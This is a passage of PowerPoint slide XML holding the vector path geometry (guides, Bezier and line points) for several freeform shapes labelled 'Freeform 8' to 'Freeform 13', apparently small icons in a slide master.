                <a:gd name="T27" fmla="*/ 32 h 57"/>
                <a:gd name="T28" fmla="*/ 58 w 67"/>
                <a:gd name="T29" fmla="*/ 32 h 57"/>
                <a:gd name="T30" fmla="*/ 58 w 67"/>
                <a:gd name="T31" fmla="*/ 37 h 57"/>
                <a:gd name="T32" fmla="*/ 47 w 67"/>
                <a:gd name="T33" fmla="*/ 48 h 57"/>
                <a:gd name="T34" fmla="*/ 5 w 67"/>
                <a:gd name="T35" fmla="*/ 48 h 57"/>
                <a:gd name="T36" fmla="*/ 0 w 67"/>
                <a:gd name="T37" fmla="*/ 53 h 57"/>
                <a:gd name="T38" fmla="*/ 0 w 67"/>
                <a:gd name="T39" fmla="*/ 57 h 57"/>
                <a:gd name="T40" fmla="*/ 46 w 67"/>
                <a:gd name="T41" fmla="*/ 57 h 57"/>
                <a:gd name="T42" fmla="*/ 60 w 67"/>
                <a:gd name="T43" fmla="*/ 52 h 57"/>
                <a:gd name="T44" fmla="*/ 67 w 67"/>
                <a:gd name="T45" fmla="*/ 37 h 57"/>
                <a:gd name="T46" fmla="*/ 67 w 67"/>
                <a:gd name="T47" fmla="*/ 2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7" h="57">
                  <a:moveTo>
                    <a:pt x="67" y="20"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="9"/>
                    <a:pt x="58" y="0"/>
                    <a:pt x="4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47" y="8"/>
                    <a:pt x="47" y="8"/>
                    <a:pt x="47" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="8"/>
                    <a:pt x="58" y="13"/>
                    <a:pt x="58" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="22"/>
                    <a:pt x="58" y="22"/>
                    <a:pt x="58" y="22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57" y="32"/>
                    <a:pt x="57" y="32"/>
                    <a:pt x="57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8" y="37"/>
                    <a:pt x="58" y="37"/>
                    <a:pt x="58" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="43"/>
                    <a:pt x="53" y="48"/>
                    <a:pt x="47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2" y="48"/>
                    <a:pt x="0" y="51"/>
                    <a:pt x="0" y="53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" y="57"/>
                    <a:pt x="46" y="57"/>
                    <a:pt x="46" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="57"/>
                    <a:pt x="56" y="55"/>
                    <a:pt x="60" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="48"/>
                    <a:pt x="67" y="41"/>
                    <a:pt x="67" y="37"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6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2" name="Freeform 8"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7840127" y="-439346"/>
              <a:ext cx="109819" cy="98136"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 66"/>
                <a:gd name="T1" fmla="*/ 21 h 58"/>
                <a:gd name="T2" fmla="*/ 0 w 66"/>
                <a:gd name="T3" fmla="*/ 38 h 58"/>
                <a:gd name="T4" fmla="*/ 20 w 66"/>
                <a:gd name="T5" fmla="*/ 58 h 58"/>
                <a:gd name="T6" fmla="*/ 51 w 66"/>
                <a:gd name="T7" fmla="*/ 58 h 58"/>
                <a:gd name="T8" fmla="*/ 66 w 66"/>
                <a:gd name="T9" fmla="*/ 43 h 58"/>
                <a:gd name="T10" fmla="*/ 66 w 66"/>
                <a:gd name="T11" fmla="*/ 39 h 58"/>
                <a:gd name="T12" fmla="*/ 51 w 66"/>
                <a:gd name="T13" fmla="*/ 24 h 58"/>
                <a:gd name="T14" fmla="*/ 9 w 66"/>
                <a:gd name="T15" fmla="*/ 24 h 58"/>
                <a:gd name="T16" fmla="*/ 9 w 66"/>
                <a:gd name="T17" fmla="*/ 24 h 58"/>
                <a:gd name="T18" fmla="*/ 9 w 66"/>
                <a:gd name="T19" fmla="*/ 23 h 58"/>
                <a:gd name="T20" fmla="*/ 9 w 66"/>
                <a:gd name="T21" fmla="*/ 21 h 58"/>
                <a:gd name="T22" fmla="*/ 20 w 66"/>
                <a:gd name="T23" fmla="*/ 9 h 58"/>
                <a:gd name="T24" fmla="*/ 61 w 66"/>
                <a:gd name="T25" fmla="*/ 9 h 58"/>
                <a:gd name="T26" fmla="*/ 66 w 66"/>
                <a:gd name="T27" fmla="*/ 4 h 58"/>
                <a:gd name="T28" fmla="*/ 66 w 66"/>
                <a:gd name="T29" fmla="*/ 0 h 58"/>
                <a:gd name="T30" fmla="*/ 20 w 66"/>
                <a:gd name="T31" fmla="*/ 0 h 58"/>
                <a:gd name="T32" fmla="*/ 0 w 66"/>
                <a:gd name="T33" fmla="*/ 21 h 58"/>
                <a:gd name="T34" fmla="*/ 9 w 66"/>
                <a:gd name="T35" fmla="*/ 33 h 58"/>
                <a:gd name="T36" fmla="*/ 51 w 66"/>
                <a:gd name="T37" fmla="*/ 33 h 58"/>
                <a:gd name="T38" fmla="*/ 57 w 66"/>
                <a:gd name="T39" fmla="*/ 39 h 58"/>
                <a:gd name="T40" fmla="*/ 57 w 66"/>
                <a:gd name="T41" fmla="*/ 43 h 58"/>
                <a:gd name="T42" fmla="*/ 51 w 66"/>
                <a:gd name="T43" fmla="*/ 49 h 58"/>
                <a:gd name="T44" fmla="*/ 20 w 66"/>
                <a:gd name="T45" fmla="*/ 49 h 58"/>
                <a:gd name="T46" fmla="*/ 9 w 66"/>
                <a:gd name="T47" fmla="*/ 38 h 58"/>
                <a:gd name="T48" fmla="*/ 9 w 66"/>
                <a:gd name="T49" fmla="*/ 33 h 58"/>
                <a:gd name="T50" fmla="*/ 9 w 66"/>
                <a:gd name="T51" fmla="*/ 3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6" h="58">
                  <a:moveTo>
                    <a:pt x="0" y="21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49"/>
                    <a:pt x="9" y="58"/>
                    <a:pt x="20" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="58"/>
                    <a:pt x="51" y="58"/>
                    <a:pt x="51" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="58"/>
                    <a:pt x="66" y="51"/>
                    <a:pt x="66" y="43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31"/>
                    <a:pt x="59" y="24"/>
                    <a:pt x="51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14"/>
                    <a:pt x="14" y="9"/>
                    <a:pt x="20" y="9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3" y="9"/>
                    <a:pt x="66" y="7"/>
                    <a:pt x="66" y="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lose/>
                  <a:moveTo>
                    <a:pt x="9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54" y="33"/>
                    <a:pt x="57" y="35"/>
                    <a:pt x="57" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="43"/>
                    <a:pt x="57" y="43"/>
                    <a:pt x="57" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="47"/>
                    <a:pt x="54" y="49"/>
                    <a:pt x="51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3"/>
                    <a:pt x="9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3" name="Freeform 9"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7961629" y="-439346"/>
              <a:ext cx="109819" cy="98136"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 66"/>
                <a:gd name="T1" fmla="*/ 38 h 58"/>
                <a:gd name="T2" fmla="*/ 20 w 66"/>
                <a:gd name="T3" fmla="*/ 58 h 58"/>
                <a:gd name="T4" fmla="*/ 46 w 66"/>
                <a:gd name="T5" fmla="*/ 58 h 58"/>
                <a:gd name="T6" fmla="*/ 66 w 66"/>
                <a:gd name="T7" fmla="*/ 38 h 58"/>
                <a:gd name="T8" fmla="*/ 66 w 66"/>
                <a:gd name="T9" fmla="*/ 21 h 58"/>
                <a:gd name="T10" fmla="*/ 46 w 66"/>
                <a:gd name="T11" fmla="*/ 0 h 58"/>
                <a:gd name="T12" fmla="*/ 20 w 66"/>
                <a:gd name="T13" fmla="*/ 0 h 58"/>
                <a:gd name="T14" fmla="*/ 0 w 66"/>
                <a:gd name="T15" fmla="*/ 21 h 58"/>
                <a:gd name="T16" fmla="*/ 0 w 66"/>
                <a:gd name="T17" fmla="*/ 38 h 58"/>
                <a:gd name="T18" fmla="*/ 9 w 66"/>
                <a:gd name="T19" fmla="*/ 21 h 58"/>
                <a:gd name="T20" fmla="*/ 20 w 66"/>
                <a:gd name="T21" fmla="*/ 9 h 58"/>
                <a:gd name="T22" fmla="*/ 46 w 66"/>
                <a:gd name="T23" fmla="*/ 9 h 58"/>
                <a:gd name="T24" fmla="*/ 57 w 66"/>
                <a:gd name="T25" fmla="*/ 21 h 58"/>
                <a:gd name="T26" fmla="*/ 57 w 66"/>
                <a:gd name="T27" fmla="*/ 38 h 58"/>
                <a:gd name="T28" fmla="*/ 46 w 66"/>
                <a:gd name="T29" fmla="*/ 49 h 58"/>
                <a:gd name="T30" fmla="*/ 20 w 66"/>
                <a:gd name="T31" fmla="*/ 49 h 58"/>
                <a:gd name="T32" fmla="*/ 9 w 66"/>
                <a:gd name="T33" fmla="*/ 38 h 58"/>
                <a:gd name="T34" fmla="*/ 9 w 66"/>
                <a:gd name="T35" fmla="*/ 2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58">
                  <a:moveTo>
                    <a:pt x="0" y="38"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="49"/>
                    <a:pt x="9" y="58"/>
                    <a:pt x="20" y="58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57" y="58"/>
                    <a:pt x="66" y="49"/>
                    <a:pt x="66" y="38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6" y="9"/>
                    <a:pt x="57" y="0"/>
                    <a:pt x="46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lnTo>
                    <a:pt x="0" y="38"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="9" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="14"/>
                    <a:pt x="14" y="9"/>
                    <a:pt x="20" y="9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52" y="9"/>
                    <a:pt x="57" y="14"/>
                    <a:pt x="57" y="21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57" y="44"/>
                    <a:pt x="52" y="49"/>
                    <a:pt x="46" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="49"/>
                    <a:pt x="20" y="49"/>
                    <a:pt x="20" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="49"/>
                    <a:pt x="9" y="44"/>
                    <a:pt x="9" y="38"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="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4" name="Freeform 10"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8465550" y="-439346"/>
              <a:ext cx="115271" cy="30376"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 6 w 69"/>
                <a:gd name="T1" fmla="*/ 18 h 18"/>
                <a:gd name="T2" fmla="*/ 13 w 69"/>
                <a:gd name="T3" fmla="*/ 15 h 18"/>
                <a:gd name="T4" fmla="*/ 17 w 69"/>
                <a:gd name="T5" fmla="*/ 11 h 18"/>
                <a:gd name="T6" fmla="*/ 19 w 69"/>
                <a:gd name="T7" fmla="*/ 9 h 18"/>
                <a:gd name="T8" fmla="*/ 26 w 69"/>
                <a:gd name="T9" fmla="*/ 8 h 18"/>
                <a:gd name="T10" fmla="*/ 45 w 69"/>
                <a:gd name="T11" fmla="*/ 8 h 18"/>
                <a:gd name="T12" fmla="*/ 49 w 69"/>
                <a:gd name="T13" fmla="*/ 9 h 18"/>
                <a:gd name="T14" fmla="*/ 52 w 69"/>
                <a:gd name="T15" fmla="*/ 11 h 18"/>
                <a:gd name="T16" fmla="*/ 56 w 69"/>
                <a:gd name="T17" fmla="*/ 15 h 18"/>
                <a:gd name="T18" fmla="*/ 63 w 69"/>
                <a:gd name="T19" fmla="*/ 18 h 18"/>
                <a:gd name="T20" fmla="*/ 68 w 69"/>
                <a:gd name="T21" fmla="*/ 18 h 18"/>
                <a:gd name="T22" fmla="*/ 69 w 69"/>
                <a:gd name="T23" fmla="*/ 18 h 18"/>
                <a:gd name="T24" fmla="*/ 69 w 69"/>
                <a:gd name="T25" fmla="*/ 11 h 18"/>
                <a:gd name="T26" fmla="*/ 68 w 69"/>
                <a:gd name="T27" fmla="*/ 11 h 18"/>
                <a:gd name="T28" fmla="*/ 63 w 69"/>
                <a:gd name="T29" fmla="*/ 11 h 18"/>
                <a:gd name="T30" fmla="*/ 60 w 69"/>
                <a:gd name="T31" fmla="*/ 9 h 18"/>
                <a:gd name="T32" fmla="*/ 57 w 69"/>
                <a:gd name="T33" fmla="*/ 4 h 18"/>
                <a:gd name="T34" fmla="*/ 54 w 69"/>
                <a:gd name="T35" fmla="*/ 2 h 18"/>
                <a:gd name="T36" fmla="*/ 45 w 69"/>
                <a:gd name="T37" fmla="*/ 0 h 18"/>
                <a:gd name="T38" fmla="*/ 22 w 69"/>
                <a:gd name="T39" fmla="*/ 0 h 18"/>
                <a:gd name="T40" fmla="*/ 12 w 69"/>
                <a:gd name="T41" fmla="*/ 4 h 18"/>
                <a:gd name="T42" fmla="*/ 8 w 69"/>
                <a:gd name="T43" fmla="*/ 9 h 18"/>
                <a:gd name="T44" fmla="*/ 1 w 69"/>
                <a:gd name="T45" fmla="*/ 11 h 18"/>
                <a:gd name="T46" fmla="*/ 0 w 69"/>
                <a:gd name="T47" fmla="*/ 11 h 18"/>
                <a:gd name="T48" fmla="*/ 0 w 69"/>
                <a:gd name="T49" fmla="*/ 18 h 18"/>
                <a:gd name="T50" fmla="*/ 1 w 69"/>
                <a:gd name="T51" fmla="*/ 18 h 18"/>
                <a:gd name="T52" fmla="*/ 6 w 69"/>
                <a:gd name="T53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9" h="18">
                  <a:moveTo>
                    <a:pt x="6" y="18"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="18"/>
                    <a:pt x="11" y="17"/>
                    <a:pt x="13" y="15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0"/>
                    <a:pt x="18" y="9"/>
                    <a:pt x="19" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="8"/>
                    <a:pt x="22" y="8"/>
                    <a:pt x="26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6" y="8"/>
                    <a:pt x="48" y="8"/>
                    <a:pt x="49" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="9"/>
                    <a:pt x="51" y="10"/>
                    <a:pt x="52" y="11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8" y="17"/>
                    <a:pt x="60" y="18"/>
                    <a:pt x="63" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="18"/>
                    <a:pt x="66" y="18"/>
                    <a:pt x="68" y="18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1"/>
                    <a:pt x="69" y="11"/>
                    <a:pt x="69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6" y="11"/>
                    <a:pt x="64" y="11"/>
                    <a:pt x="63" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="10"/>
                    <a:pt x="61" y="10"/>
                    <a:pt x="60" y="9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56" y="3"/>
                    <a:pt x="55" y="2"/>
                    <a:pt x="54" y="2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4" y="2"/>
                    <a:pt x="12" y="4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11"/>
                    <a:pt x="5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3" y="18"/>
                    <a:pt x="4" y="18"/>
                    <a:pt x="6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5" name="Freeform 11"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8465550" y="-407413"/>
              <a:ext cx="115271" cy="69319"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 38 w 69"/>
                <a:gd name="T1" fmla="*/ 33 h 41"/>
                <a:gd name="T2" fmla="*/ 38 w 69"/>
                <a:gd name="T3" fmla="*/ 23 h 41"/>
                <a:gd name="T4" fmla="*/ 62 w 69"/>
                <a:gd name="T5" fmla="*/ 23 h 41"/>
                <a:gd name="T6" fmla="*/ 67 w 69"/>
                <a:gd name="T7" fmla="*/ 19 h 41"/>
                <a:gd name="T8" fmla="*/ 67 w 69"/>
                <a:gd name="T9" fmla="*/ 15 h 41"/>
                <a:gd name="T10" fmla="*/ 38 w 69"/>
                <a:gd name="T11" fmla="*/ 15 h 41"/>
                <a:gd name="T12" fmla="*/ 38 w 69"/>
                <a:gd name="T13" fmla="*/ 8 h 41"/>
                <a:gd name="T14" fmla="*/ 62 w 69"/>
                <a:gd name="T15" fmla="*/ 8 h 41"/>
                <a:gd name="T16" fmla="*/ 67 w 69"/>
                <a:gd name="T17" fmla="*/ 3 h 41"/>
                <a:gd name="T18" fmla="*/ 67 w 69"/>
                <a:gd name="T19" fmla="*/ 0 h 41"/>
                <a:gd name="T20" fmla="*/ 2 w 69"/>
                <a:gd name="T21" fmla="*/ 0 h 41"/>
                <a:gd name="T22" fmla="*/ 2 w 69"/>
                <a:gd name="T23" fmla="*/ 8 h 41"/>
                <a:gd name="T24" fmla="*/ 30 w 69"/>
                <a:gd name="T25" fmla="*/ 8 h 41"/>
                <a:gd name="T26" fmla="*/ 30 w 69"/>
                <a:gd name="T27" fmla="*/ 15 h 41"/>
                <a:gd name="T28" fmla="*/ 2 w 69"/>
                <a:gd name="T29" fmla="*/ 15 h 41"/>
                <a:gd name="T30" fmla="*/ 2 w 69"/>
                <a:gd name="T31" fmla="*/ 23 h 41"/>
                <a:gd name="T32" fmla="*/ 30 w 69"/>
                <a:gd name="T33" fmla="*/ 23 h 41"/>
                <a:gd name="T34" fmla="*/ 30 w 69"/>
                <a:gd name="T35" fmla="*/ 33 h 41"/>
                <a:gd name="T36" fmla="*/ 0 w 69"/>
                <a:gd name="T37" fmla="*/ 33 h 41"/>
                <a:gd name="T38" fmla="*/ 0 w 69"/>
                <a:gd name="T39" fmla="*/ 41 h 41"/>
                <a:gd name="T40" fmla="*/ 65 w 69"/>
                <a:gd name="T41" fmla="*/ 41 h 41"/>
                <a:gd name="T42" fmla="*/ 69 w 69"/>
                <a:gd name="T43" fmla="*/ 37 h 41"/>
                <a:gd name="T44" fmla="*/ 69 w 69"/>
                <a:gd name="T45" fmla="*/ 33 h 41"/>
                <a:gd name="T46" fmla="*/ 38 w 69"/>
                <a:gd name="T47" fmla="*/ 33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9" h="41">
                  <a:moveTo>
                    <a:pt x="38" y="33"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="23"/>
                    <a:pt x="38" y="23"/>
                    <a:pt x="38" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="23"/>
                    <a:pt x="62" y="23"/>
                    <a:pt x="62" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="23"/>
                    <a:pt x="67" y="21"/>
                    <a:pt x="67" y="19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38" y="15"/>
                    <a:pt x="38" y="15"/>
                    <a:pt x="38" y="15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5" y="8"/>
                    <a:pt x="67" y="6"/>
                    <a:pt x="67" y="3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7" y="41"/>
                    <a:pt x="69" y="39"/>
                    <a:pt x="69" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="33"/>
                    <a:pt x="69" y="33"/>
                    <a:pt x="69" y="33"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="38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6" name="Freeform 12"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8339375" y="-439346"/>
              <a:ext cx="112935" cy="27260"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 7 w 68"/>
                <a:gd name="T1" fmla="*/ 13 h 16"/>
                <a:gd name="T2" fmla="*/ 8 w 68"/>
                <a:gd name="T3" fmla="*/ 11 h 16"/>
                <a:gd name="T4" fmla="*/ 13 w 68"/>
                <a:gd name="T5" fmla="*/ 10 h 16"/>
                <a:gd name="T6" fmla="*/ 57 w 68"/>
                <a:gd name="T7" fmla="*/ 10 h 16"/>
                <a:gd name="T8" fmla="*/ 60 w 68"/>
                <a:gd name="T9" fmla="*/ 12 h 16"/>
                <a:gd name="T10" fmla="*/ 61 w 68"/>
                <a:gd name="T11" fmla="*/ 13 h 16"/>
                <a:gd name="T12" fmla="*/ 61 w 68"/>
                <a:gd name="T13" fmla="*/ 16 h 16"/>
                <a:gd name="T14" fmla="*/ 68 w 68"/>
                <a:gd name="T15" fmla="*/ 16 h 16"/>
                <a:gd name="T16" fmla="*/ 68 w 68"/>
                <a:gd name="T17" fmla="*/ 12 h 16"/>
                <a:gd name="T18" fmla="*/ 65 w 68"/>
                <a:gd name="T19" fmla="*/ 6 h 16"/>
                <a:gd name="T20" fmla="*/ 57 w 68"/>
                <a:gd name="T21" fmla="*/ 4 h 16"/>
                <a:gd name="T22" fmla="*/ 38 w 68"/>
                <a:gd name="T23" fmla="*/ 4 h 16"/>
                <a:gd name="T24" fmla="*/ 38 w 68"/>
                <a:gd name="T25" fmla="*/ 0 h 16"/>
                <a:gd name="T26" fmla="*/ 30 w 68"/>
                <a:gd name="T27" fmla="*/ 0 h 16"/>
                <a:gd name="T28" fmla="*/ 30 w 68"/>
                <a:gd name="T29" fmla="*/ 4 h 16"/>
                <a:gd name="T30" fmla="*/ 10 w 68"/>
                <a:gd name="T31" fmla="*/ 4 h 16"/>
                <a:gd name="T32" fmla="*/ 3 w 68"/>
                <a:gd name="T33" fmla="*/ 6 h 16"/>
                <a:gd name="T34" fmla="*/ 0 w 68"/>
                <a:gd name="T35" fmla="*/ 12 h 16"/>
                <a:gd name="T36" fmla="*/ 0 w 68"/>
                <a:gd name="T37" fmla="*/ 16 h 16"/>
                <a:gd name="T38" fmla="*/ 7 w 68"/>
                <a:gd name="T39" fmla="*/ 16 h 16"/>
                <a:gd name="T40" fmla="*/ 7 w 68"/>
                <a:gd name="T41" fmla="*/ 1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8" h="16">
                  <a:moveTo>
                    <a:pt x="7" y="13"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="12"/>
                    <a:pt x="8" y="11"/>
                    <a:pt x="8" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="11"/>
                    <a:pt x="11" y="10"/>
                    <a:pt x="13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8" y="10"/>
                    <a:pt x="59" y="11"/>
                    <a:pt x="60" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="12"/>
                    <a:pt x="61" y="13"/>
                    <a:pt x="61" y="13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9"/>
                    <a:pt x="67" y="7"/>
                    <a:pt x="65" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="4"/>
                    <a:pt x="61" y="4"/>
                    <a:pt x="5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4"/>
                    <a:pt x="5" y="4"/>
                    <a:pt x="3" y="6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16"/>
                    <a:pt x="7" y="16"/>
                    <a:pt x="7" y="16"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="7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7" name="Freeform 13"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8339375" y="-410528"/>
              <a:ext cx="112935" cy="70876"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 64 w 68"/>
                <a:gd name="T1" fmla="*/ 36 h 42"/>
                <a:gd name="T2" fmla="*/ 53 w 68"/>
                <a:gd name="T3" fmla="*/ 35 h 42"/>
                <a:gd name="T4" fmla="*/ 43 w 68"/>
                <a:gd name="T5" fmla="*/ 33 h 42"/>
                <a:gd name="T6" fmla="*/ 55 w 68"/>
                <a:gd name="T7" fmla="*/ 29 h 42"/>
                <a:gd name="T8" fmla="*/ 58 w 68"/>
                <a:gd name="T9" fmla="*/ 26 h 42"/>
                <a:gd name="T10" fmla="*/ 62 w 68"/>
                <a:gd name="T11" fmla="*/ 16 h 42"/>
                <a:gd name="T12" fmla="*/ 62 w 68"/>
                <a:gd name="T13" fmla="*/ 12 h 42"/>
                <a:gd name="T14" fmla="*/ 65 w 68"/>
                <a:gd name="T15" fmla="*/ 12 h 42"/>
                <a:gd name="T16" fmla="*/ 68 w 68"/>
                <a:gd name="T17" fmla="*/ 8 h 42"/>
                <a:gd name="T18" fmla="*/ 68 w 68"/>
                <a:gd name="T19" fmla="*/ 5 h 42"/>
                <a:gd name="T20" fmla="*/ 62 w 68"/>
                <a:gd name="T21" fmla="*/ 5 h 42"/>
                <a:gd name="T22" fmla="*/ 62 w 68"/>
                <a:gd name="T23" fmla="*/ 0 h 42"/>
                <a:gd name="T24" fmla="*/ 55 w 68"/>
                <a:gd name="T25" fmla="*/ 0 h 42"/>
                <a:gd name="T26" fmla="*/ 55 w 68"/>
                <a:gd name="T27" fmla="*/ 5 h 42"/>
                <a:gd name="T28" fmla="*/ 13 w 68"/>
                <a:gd name="T29" fmla="*/ 5 h 42"/>
                <a:gd name="T30" fmla="*/ 13 w 68"/>
                <a:gd name="T31" fmla="*/ 0 h 42"/>
                <a:gd name="T32" fmla="*/ 6 w 68"/>
                <a:gd name="T33" fmla="*/ 0 h 42"/>
                <a:gd name="T34" fmla="*/ 6 w 68"/>
                <a:gd name="T35" fmla="*/ 5 h 42"/>
                <a:gd name="T36" fmla="*/ 0 w 68"/>
                <a:gd name="T37" fmla="*/ 5 h 42"/>
                <a:gd name="T38" fmla="*/ 0 w 68"/>
                <a:gd name="T39" fmla="*/ 12 h 42"/>
                <a:gd name="T40" fmla="*/ 6 w 68"/>
                <a:gd name="T41" fmla="*/ 12 h 42"/>
                <a:gd name="T42" fmla="*/ 6 w 68"/>
                <a:gd name="T43" fmla="*/ 18 h 42"/>
                <a:gd name="T44" fmla="*/ 9 w 68"/>
                <a:gd name="T45" fmla="*/ 25 h 42"/>
                <a:gd name="T46" fmla="*/ 16 w 68"/>
                <a:gd name="T47" fmla="*/ 30 h 42"/>
                <a:gd name="T48" fmla="*/ 25 w 68"/>
                <a:gd name="T49" fmla="*/ 33 h 42"/>
                <a:gd name="T50" fmla="*/ 12 w 68"/>
                <a:gd name="T51" fmla="*/ 35 h 42"/>
                <a:gd name="T52" fmla="*/ 0 w 68"/>
                <a:gd name="T53" fmla="*/ 36 h 42"/>
                <a:gd name="T54" fmla="*/ 0 w 68"/>
                <a:gd name="T55" fmla="*/ 36 h 42"/>
                <a:gd name="T56" fmla="*/ 0 w 68"/>
                <a:gd name="T57" fmla="*/ 42 h 42"/>
                <a:gd name="T58" fmla="*/ 0 w 68"/>
                <a:gd name="T59" fmla="*/ 42 h 42"/>
                <a:gd name="T60" fmla="*/ 27 w 68"/>
                <a:gd name="T61" fmla="*/ 39 h 42"/>
                <a:gd name="T62" fmla="*/ 34 w 68"/>
                <a:gd name="T63" fmla="*/ 37 h 42"/>
                <a:gd name="T64" fmla="*/ 41 w 68"/>
                <a:gd name="T65" fmla="*/ 39 h 42"/>
                <a:gd name="T66" fmla="*/ 54 w 68"/>
                <a:gd name="T67" fmla="*/ 42 h 42"/>
                <a:gd name="T68" fmla="*/ 68 w 68"/>
                <a:gd name="T69" fmla="*/ 42 h 42"/>
                <a:gd name="T70" fmla="*/ 68 w 68"/>
                <a:gd name="T71" fmla="*/ 42 h 42"/>
                <a:gd name="T72" fmla="*/ 68 w 68"/>
                <a:gd name="T73" fmla="*/ 36 h 42"/>
                <a:gd name="T74" fmla="*/ 68 w 68"/>
                <a:gd name="T75" fmla="*/ 36 h 42"/>
                <a:gd name="T76" fmla="*/ 64 w 68"/>
                <a:gd name="T77" fmla="*/ 36 h 42"/>
                <a:gd name="T78" fmla="*/ 55 w 68"/>
                <a:gd name="T79" fmla="*/ 16 h 42"/>
                <a:gd name="T80" fmla="*/ 49 w 68"/>
                <a:gd name="T81" fmla="*/ 24 h 42"/>
                <a:gd name="T82" fmla="*/ 34 w 68"/>
                <a:gd name="T83" fmla="*/ 30 h 42"/>
                <a:gd name="T84" fmla="*/ 19 w 68"/>
                <a:gd name="T85" fmla="*/ 24 h 42"/>
                <a:gd name="T86" fmla="*/ 15 w 68"/>
                <a:gd name="T87" fmla="*/ 21 h 42"/>
                <a:gd name="T88" fmla="*/ 14 w 68"/>
                <a:gd name="T89" fmla="*/ 17 h 42"/>
                <a:gd name="T90" fmla="*/ 13 w 68"/>
                <a:gd name="T91" fmla="*/ 12 h 42"/>
                <a:gd name="T92" fmla="*/ 55 w 68"/>
                <a:gd name="T93" fmla="*/ 12 h 42"/>
                <a:gd name="T94" fmla="*/ 55 w 68"/>
                <a:gd name="T95" fmla="*/ 1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8" h="42">
                  <a:moveTo>
                    <a:pt x="64" y="36"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="36"/>
                    <a:pt x="56" y="35"/>
                    <a:pt x="53" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="35"/>
                    <a:pt x="47" y="34"/>
                    <a:pt x="43" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="30"/>
                    <a:pt x="54" y="29"/>
                    <a:pt x="55" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="28"/>
                    <a:pt x="57" y="27"/>
                    <a:pt x="58" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
